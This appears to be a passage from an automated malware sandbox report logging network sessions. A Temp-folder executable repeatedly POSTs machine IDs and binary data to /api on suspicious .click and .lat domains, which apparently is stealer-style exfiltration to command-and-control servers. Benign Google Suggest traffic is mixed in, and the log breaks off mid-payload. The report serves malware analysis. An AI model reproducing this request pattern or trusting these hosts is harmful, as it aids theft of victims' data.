                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              62192.168.2.450263104.21.89.1154437796C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=IAOCVBVCFD2DKJ4Q
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                                                                                              Host: fieldhitty.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1403OUTData Raw: 2d 2d 49 41 4f 43 56 42 56 43 46 44 32 44 4b 4a 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 49 41 4f 43 56 42 56 43 46 44 32 44 4b 4a 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 41 4f 43 56 42 56 43 46 44 32 44 4b 4a 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 76 62 41 72 5a 2d 2d 0d 0a 2d 2d 49 41 4f 43 56 42 56
                                                                                                                                                                                                                                                              Data Ascii: --IAOCVBVCFD2DKJ4QContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--IAOCVBVCFD2DKJ4QContent-Disposition: form-data; name="pid"1--IAOCVBVCFD2DKJ4QContent-Disposition: form-data; name="lid"PvbArZ----IAOCVBV
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:03 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=8n7mlaknhsn0ekq4dkl2t1caeh; expires=Wed, 16 Apr 2025 19:05:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWrk6U1Pwmo54oqkbGRMzRsZhdZiDKzAMxqaIOtyg7QZAj21JGaJ6D8NPBL%2FrTiCTerX5ec%2BZ3wQUU8KYckCee%2BT2TOoFlik6nt%2BA93xRWl0KjKUzXLOBQ5Z6%2BVpb0tm%2B3GF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c480a9fa67cb1-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1785&rtt_var=690&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2318&delivery_rate=1563169&cwnd=235&unsent_bytes=0&cid=c3fc45603f625d66&ts=1071&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              63192.168.2.450262172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:03 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-dFP9q_2wId9wZrIe0IyxuA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC124INData Raw: 35 64 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 73 35 20 70 72 6f 22 2c 22 72 6f 68 20 77 72 65 73 74 6c 69 6e 67 20 66 69 6e 61 6c 20 62 61 74 74 6c 65 22 2c 22 63 6f 6d 6d 65 72 63 69 61 6c 20 74 65 61 20 62 61 67 73 20 6d 69 63 72 6f 70 6c 61 73 74 69 63 73 22 2c 22 64 6f 67 65 63 6f 69 6e 20 70 72 69 63 65 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 61 6e 74 68 6f
                                                                                                                                                                                                                                                              Data Ascii: 5d8)]}'["",["ps5 pro","roh wrestling final battle","commercial tea bags microplastics","dogecoin price prediction","antho
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC1379INData Raw: 6e 79 20 72 69 7a 7a 6f 22 2c 22 74 68 65 20 65 64 64 69 65 20 61 69 6b 61 75 20 62 69 67 20 77 61 76 65 20 69 6e 76 69 74 61 74 69 6f 6e 61 6c 22 2c 22 75 72 73 69 64 73 20 6d 65 74 65 6f 72 20 73 68 6f 77 65 72 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 31 37 20 70 72 6f 20 6d 61 78 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74
                                                                                                                                                                                                                                                              Data Ascii: ny rizzo","the eddie aikau big wave invitational","ursids meteor shower","apple iphone 17 pro max"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggest
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC89INData Raw: 35 33 0d 0a 50 63 46 64 79 53 47 70 46 65 53 39 59 4d 6d 59 78 63 57 78 77 53 6d 73 77 4d 43 74 55 54 54 4e 61 63 57 4e 6b 64 48 49 32 56 30 56 49 56 47 4a 78 51 6a 52 57 59 54 64 6c 57 6c 6f 31 59 32 68 58 56 57 73 33 55 58 42 51 51 6a 56 4b 53 6e 67 77 64 30 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 53PcFdySGpFeS9YMmYxcWxwSmswMCtUTTNacWNkdHI2V0VIVGJxQjRWYTdlWlo1Y2hXVWs3UXBQQjVKSngwd0
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC1390INData Raw: 37 33 31 0d 0a 30 76 51 32 64 59 53 6d 59 33 55 45 77 7a 56 32 55 34 4d 6b 35 7a 65 44 55 30 4e 48 46 6b 56 44 5a 59 59 33 70 54 55 32 46 51 57 6c 4a 36 61 55 68 5a 65 6b 74 61 51 6d 78 44 4e 6d 64 61 57 56 6f 34 4f 43 74 6d 61 55 74 72 64 58 51 34 53 6b 70 5a 53 7a 5a 4c 5a 6b 39 46 63 45 70 6e 4e 6b 64 36 63 31 5a 52 54 6d 55 32 62 6d 46 53 63 6d 35 77 53 45 6c 44 56 44 67 76 4d 6b 35 6b 64 48 46 31 5a 31 64 75 52 6e 52 42 4f 54 49 32 4f 55 35 78 59 6e 5a 52 64 48 67 32 56 6e 46 31 54 33 6c 76 4c 32 64 30 64 47 4e 53 55 6a 6b 7a 59 30 4a 4e 65 57 39 6d 52 54 42 76 57 47 46 59 52 31 52 47 51 57 39 71 4f 48 6c 55 61 57 67 35 62 43 74 72 54 44 68 51 57 58 64 71 64 46 42 6b 55 33 52 30 64 44 6c 4d 55 30 56 6c 51 6d 31 5a 61 32 34 31 51 56 6b 72 64 47 51 76
                                                                                                                                                                                                                                                              Data Ascii: 7310vQ2dYSmY3UEwzV2U4Mk5zeDU0NHFkVDZYY3pTU2FQWlJ6aUhZektaQmxDNmdaWVo4OCtmaUtrdXQ4SkpZSzZLZk9FcEpnNkd6c1ZRTmU2bmFScm5wSElDVDgvMk5kdHF1Z1duRnRBOTI2OU5xYnZRdHg2VnF1T3lvL2d0dGNSUjkzY0JNeW9mRTBvWGFYR1RGQW9qOHlUaWg5bCtrTDhQWXdqdFBkU3R0dDlMU0VlQm1Za241QVkrdGQv
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC458INData Raw: 6c 53 6e 70 71 4e 48 52 4d 55 44 46 55 5a 45 6c 55 4d 48 4e 36 54 47 4e 7a 65 56 6c 51 56 47 6c 55 59 33 64 79 65 57 4e 71 55 48 45 78 55 57 39 35 63 58 6c 78 65 57 64 6a 51 57 51 33 55 55 70 51 64 33 41 47 63 41 63 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 36 36 38 32 34 38 36 33 31 39 39 33 34 30 33 31 36 36 31 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67
                                                                                                                                                                                                                                                              Data Ascii: lSnpqNHRMUDFUZElUMHN6TGNzeVlQVGlUY3dyeWNqUHExUW95cXlxeWdjQWQ3UUpQd3AGcAc\u003d","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":6682486319934031661,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:sug
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              64192.168.2.450264104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=00GUKPW01ECHG9
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18142
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC15331OUTData Raw: 2d 2d 30 30 47 55 4b 50 57 30 31 45 43 48 47 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 30 30 47 55 4b 50 57 30 31 45 43 48 47 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 30 47 55 4b 50 57 30 31 45 43 48 47 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 30 30 47 55 4b
                                                                                                                                                                                                                                                              Data Ascii: --00GUKPW01ECHG9Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--00GUKPW01ECHG9Content-Disposition: form-data; name="pid"2--00GUKPW01ECHG9Content-Disposition: form-data; name="lid"CZJvss--geopoxid--00GUK
                                                                                                                                                                                                                                                              2024-12-22 01:19:03 UTC2811OUTData Raw: 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43
                                                                                                                                                                                                                                                              Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wEC
                                                                                                                                                                                                                                                              2024-12-22 01:19:04 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:04 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=ooo0uhdevoalf8nvjndsj25jsa; expires=Wed, 16 Apr 2025 19:05:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3nKJNuoQOjn2lYUXaifH6OtC2RQy0GOPHDXx6fEbl1NlpvLWjkJHNMIdyCCKHzS6gCfCtJBgU%2BIJXDsmqSRIIth7IMkOZNQuyzhtAn3hoa1uG54nX%2FW5L2fB7eH27txwjXGpZc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c480e08750f7d-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1487&rtt_var=773&sent=16&recv=22&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19191&delivery_rate=1242553&cwnd=217&unsent_bytes=0&cid=c9019e49d02fbec2&ts=1140&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:19:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              65192.168.2.450274104.21.67.146443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:05 UTC363OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=45QMJ3WTD
                                                                                                                                                                                                                                                              Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8733
                                                                                                                                                                                                                                                              Host: cheapptaxysu.click
                                                                                                                                                                                                                                                              2024-12-22 01:19:05 UTC8733OUTData Raw: 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 34 35 51 4d 4a 33 57 54 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                              Data Ascii: --45QMJ3WTDContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--45QMJ3WTDContent-Disposition: form-data; name="pid"2--45QMJ3WTDContent-Disposition: form-data; name="lid"CZJvss--geopoxid--45QMJ3WTDContent-D
                                                                                                                                                                                                                                                              2024-12-22 01:19:06 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=u7mbe2q3e0e06vi8ae25a3jpuo; expires=Wed, 16 Apr 2025 19:05:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drQTzGisjlEkg1p1Tv%2Fe7yCXKY134DG77OpAm98%2FPqLLFRqdo%2B3LVLtnBnTx3Uqk3PSlFAzZKcRXDoACR9CBaMrS2cFMernrLSVVE1DRn%2BivOUNInhupDeg3xjaLDOdRHn%2B8ylQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c481dbd21726e-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2013&rtt_var=758&sent=10&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9754&delivery_rate=1441263&cwnd=224&unsent_bytes=0&cid=61d6a9168b2f397a&ts=1134&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:19:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:19:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              66192.168.2.450276104.21.21.99443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:05 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=76C562P8LE
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 46703
                                                                                                                                                                                                                                                              Host: discokeyus.lat
                                                                                                                                                                                                                                                              2024-12-22 01:19:05 UTC15331OUTData Raw: 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 37 36 43 35 36 32 50 38 4c 45 0d 0a 43 6f 6e 74 65 6e 74 2d
